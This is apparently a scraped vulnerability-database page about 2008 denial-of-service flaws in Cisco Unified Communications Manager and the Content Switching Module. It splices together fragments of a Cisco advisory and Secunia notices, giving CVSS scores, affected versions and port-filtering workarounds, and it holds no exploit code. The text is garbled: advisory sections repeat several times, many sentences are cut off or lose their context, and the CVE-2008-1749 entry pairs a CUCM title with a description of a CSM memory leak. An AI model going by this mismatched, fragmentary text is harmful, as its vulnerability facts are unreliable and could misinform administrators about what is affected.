a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered internally by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2008-May-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW
GpnghuWFfH2gIjp6Yk6857c=
=L6xn
-----END PGP SIGNATURE-----
| VAR-200805-0211 | CVE-2008-1747 | Cisco Unified Communications Manager Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Cisco Unified Communications Manager 4.1 before 4.1(3)SR6, 4.2 before 4.2(3)SR3, 4.3 before 4.3(2), 5.x before 5.1(3), and 6.x before 6.1(1) allows remote attackers to cause a denial of service (CCM service restart) via an unspecified SIP INVITE message, aka Bug ID CSCsk46944. Cisco Unified Communications Manager There is a service disruption (DoS) An unknown vulnerability exists. The problem is Bug ID : CSCsk46944 It is a problem.Please refer to the “Overview” for the impact of this vulnerability.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application. The vulnerability stems from the failure of the network system or product to properly validate the input data. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
This vulnerability is reported in version 5.x.
2) Another error within the CTL Provider service can be exploited to
consume large amounts of memory resources via a series of specially
crafted packets sent to default port 2444/TCP.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, and 4.3.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and
6.x.
SOLUTION:
Update to the fixed versions.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. These
vulnerabilities were discovered internally by Cisco. Workarounds that mitigate some of these
vulnerabilities are available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml. The software version
can also be determined by running the command show version active via
the command line interface (CLI). No other Cisco products are currently known to be
affected by these vulnerabilities.
Details
=======
Cisco Unified Communications Manager is the call processing component
of the Cisco IP Telephony solution that extends enterprise telephony
features and functions to packet telephony network devices, such as
IP phones, media processing devices, voice-over-IP (VoIP) gateways,
and multimedia applications. The CTL Provider service listens
by default on TCP port 2444 and is user configurable. The CTL
Provider service is enabled by default. There is a workaround for
this vulnerability. The CTL Provider service listens by default on
TCP port 2444 and is user configurable. There is a workaround for
this vulnerability. The CAPF service listens by default on TCP port 3804 and
is user configurable. The CAPF service is disabled by default. There
is a workaround for this vulnerability. There is no workaround for this
vulnerability. There is no workaround for
this vulnerability. There is no workaround for
this vulnerability. The SNMP Trap Agent service listens by default on
UDP port 61441. There is a workaround for this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi98433 - CTLProvider leaks memory in certain scenarios
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46770 - CAPF crash with network traffic
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46944 - CCM service restarts on receiving a valid SIP Packet
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsl22355 - CCM does not validate SIP URL input properly
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities in this advisory may
result in the interruption of voice services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance. It can downloaded at the
following link:
http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2
Workarounds
===========
CTL Provider Related Vulnerabilities
To mitigate against the CTL Provider service vulnerabilities
(CSCsj80609 and CSCsi98433), system administrators can disable the
CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL
Provider menu selection.
It is possible to mitigate the CTL Provider vulnerabilities by
implementing filtering on screening devices. If the CTL Provider
service is enabled, permit access to TCP port 2444 only between the
Cisco Unified Communications Manager systems where the CTL Provider
service is active and the CTL Client, usually on the administrator's
workstation, to mitigate the CTL Provider service overflow.
Note: It is possible to change the default port of the CTL Provider
service (TCP port 2444). If changed, filtering should be based on the
values used.
CAPF Related Vulnerability
To mitigate against the CAPF service vulnerability (CSCsk46770),
system administrators can disable the CAPF service if it is not
needed. If phones are not
configured to use certificates, then the CAPF service can be
disabled. The CAPF service is controlled by the Cisco Certificate
Authority Proxy Function menu selection.
It is possible to mitigate the CAPF vulnerability by implementing
filtering on screening devices. If the CAPF service is enabled,
permit access to TCP port 3804 only from networks that contain IP
phone devices needing to utilize the CAPF service.
SIP-Related Vulnerabilities
It is possible to mitigate the SIP vulnerabilities by implementing
filtering on screening devices.
SNMP Trap-Related Vulnerability
To mitigate against the SNMP Trap service vulnerability (CSCsj24113),
system administrators can disable the SNMP Trap service. To disable the
Windows SNMP service, navigate to Start > Programs > Administrative
Tools > Services, and stop the SNMP Service.
Note: The SNMP Trap Service listed in the Windows Service
configuration screen is not applicable to this vulnerability and
disabling it does not provide any benefit as a workaround for this
vulnerability.
It is possible to mitigate the SNMP Trap service vulnerability by
implementing filtering on screening devices. Permit access to UDP
port 61441 only from management systems that need access to the SNMP
Trap service. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
ustomers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered internally by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2008-May-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW
GpnghuWFfH2gIjp6Yk6857c=
=L6xn
-----END PGP SIGNATURE-----
| VAR-200805-0212 | CVE-2008-1748 | Cisco Unified Communications Manager Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco Unified Communications Manager 4.1 before 4.1(3)SR7, 4.2 before 4.2(3)SR4, 4.3 before 4.3(2), 5.x before 5.1(3), and 6.x before 6.1(1) does not properly validate SIP URLs, which allows remote attackers to cause a denial of service (service interruption) via a SIP INVITE message, aka Bug ID CSCsl22355. Cisco Unified Communications Manager There is a service disruption (DoS) Vulnerabilities exist. The problem is Bug ID : CSCsl22355 It is a problem.Please refer to the “Overview” for the impact of this vulnerability.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application. Cisco CUCM 4.1 prior to 4.1(3)SR7, 4.2 prior to 4.2(3)SR4, 4.3 prior to 4.3(2), 5.x prior to 5.1(3), 6. There is an input validation error vulnerability in version x, which is caused by not validating the SIP URL properly. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
This vulnerability is reported in version 5.x.
2) Another error within the CTL Provider service can be exploited to
consume large amounts of memory resources via a series of specially
crafted packets sent to default port 2444/TCP.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, and 4.3.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and
6.x.
SOLUTION:
Update to the fixed versions.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. These
vulnerabilities were discovered internally by Cisco. Workarounds that mitigate some of these
vulnerabilities are available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml. The software version
can also be determined by running the command show version active via
the command line interface (CLI). No other Cisco products are currently known to be
affected by these vulnerabilities.
Details
=======
Cisco Unified Communications Manager is the call processing component
of the Cisco IP Telephony solution that extends enterprise telephony
features and functions to packet telephony network devices, such as
IP phones, media processing devices, voice-over-IP (VoIP) gateways,
and multimedia applications. The CTL Provider service listens
by default on TCP port 2444 and is user configurable. The CTL
Provider service is enabled by default. There is a workaround for
this vulnerability. The CTL Provider service listens by default on
TCP port 2444 and is user configurable. There is a workaround for
this vulnerability.
Certificate Authority Proxy Function Related Vulnerability
The Certificate Authority Proxy Function (CAPF) service of Cisco
Unified Communications Manager versions 4.1, 4.2 and 4.3 contain a
vulnerability when handling malformed input that may result in a DoS
condition. The CAPF service listens by default on TCP port 3804 and
is user configurable. The CAPF service is disabled by default. There
is a workaround for this vulnerability. There is no workaround for this
vulnerability. There is no workaround for
this vulnerability. There is no workaround for
this vulnerability. The SNMP Trap Agent service listens by default on
UDP port 61441. There is a workaround for this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi98433 - CTLProvider leaks memory in certain scenarios
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46770 - CAPF crash with network traffic
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46944 - CCM service restarts on receiving a valid SIP Packet
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsl22355 - CCM does not validate SIP URL input properly
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities in this advisory may
result in the interruption of voice services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance. It can downloaded at the
following link:
http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2
Workarounds
===========
CTL Provider Related Vulnerabilities
To mitigate against the CTL Provider service vulnerabilities
(CSCsj80609 and CSCsi98433), system administrators can disable the
CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL
Provider menu selection.
It is possible to mitigate the CTL Provider vulnerabilities by
implementing filtering on screening devices. If the CTL Provider
service is enabled, permit access to TCP port 2444 only between the
Cisco Unified Communications Manager systems where the CTL Provider
service is active and the CTL Client, usually on the administrator's
workstation, to mitigate the CTL Provider service overflow.
Note: It is possible to change the default port of the CTL Provider
service (TCP port 2444). If changed, filtering should be based on the
values used.
CAPF Related Vulnerability
To mitigate against the CAPF service vulnerability (CSCsk46770),
system administrators can disable the CAPF service if it is not
needed. If phones are not
configured to use certificates, then the CAPF service can be
disabled. The CAPF service is controlled by the Cisco Certificate
Authority Proxy Function menu selection.
It is possible to mitigate the CAPF vulnerability by implementing
filtering on screening devices. If the CAPF service is enabled,
permit access to TCP port 3804 only from networks that contain IP
phone devices needing to utilize the CAPF service.
SIP-Related Vulnerabilities
It is possible to mitigate the SIP vulnerabilities by implementing
filtering on screening devices.
SNMP Trap-Related Vulnerability
To mitigate against the SNMP Trap service vulnerability (CSCsj24113),
system administrators can disable the SNMP Trap service. To disable the
Windows SNMP service, navigate to Start > Programs > Administrative
Tools > Services, and stop the SNMP Service.
Note: The SNMP Trap Service listed in the Windows Service
configuration screen is not applicable to this vulnerability and
disabling it does not provide any benefit as a workaround for this
vulnerability.
It is possible to mitigate the SNMP Trap service vulnerability by
implementing filtering on screening devices. Permit access to UDP
port 61441 only from management systems that need access to the SNMP
Trap service. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
ustomers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered internally by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2008-May-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW
GpnghuWFfH2gIjp6Yk6857c=
=L6xn
-----END PGP SIGNATURE-----
| VAR-200805-0213 | CVE-2008-1749 | Cisco Unified Communications Manager Multiple Denial of Service Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Memory leak in Cisco Content Switching Module (CSM) 4.2(3) up to 4.2(8) and Cisco Content Switching Module with SSL (CSM-S) 2.1(2) up to 2.1(7) allows remote attackers to cause a denial of service (memory consumption) via TCP segments with an unspecified combination of TCP flags. Cisco Unified Communications Manager is prone to multiple denial-of-service vulnerabilities.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application. This issue occurs when CSM and CSM-S are configured to use layer 7 load balancing.
An attacker can exploit this issue to cause devices using the module to stop accepting TCP connections or to overload, denying service to legitimate users. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
Cisco CSM 4.2.9:
http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-csm?psrtdcat20e2
Cisco CSM 2.1.8:
http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-csms?psrtdcat20e2
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-csm.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
Cisco has released free software updates that address this
vulnerability.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-csm.shtml.
Affected Products
=================
Vulnerable Products
+------------------
The Cisco CSM and Cisco CSM-S are affected by the vulnerability
described in this document if they are running an affected software
version and are configured for layer 7 load balancing.
The following versions of the Cisco CSM software are affected by this
vulnerability: 4.2(3), 4.2(3a), 4.2(4), 4.2(5), 4.2(6), 4.2(7), and
4.2(8).
The following versions of the Cisco CSM-S software are also affected by
this vulnerability: 2.1(2), 2.1(3), 2.1(4), 2.1(5), 2.1(6), and 2.1(7).
To determine the software version in use by the CSM or CSM-S, log into
the supervisor of the chassis that hosts the CSM or CSM-S modules and
issue the command "show module version" (Cisco IOS) or "show version"
(Cisco CatOS). CSM modules will display as model "WS-X6066-SLB-APC",
CSM-S modules will display as model "WS-X6066-SLB-S-K9", and the
software version will be indicated next to the "Sw:" label.
Note that the output from "show module version" (for Cisco IOS) is
slightly different from the output from "show version" (for Cisco
CatOS). However, in both cases the model names will read as previously
described, and the software version will be easily identified by looking
for the "Sw:" label.
The following example shows a CSM in slot number 4 running software
version 4.2(3):
switch>show module version
Mod Port Model Serial # Versions
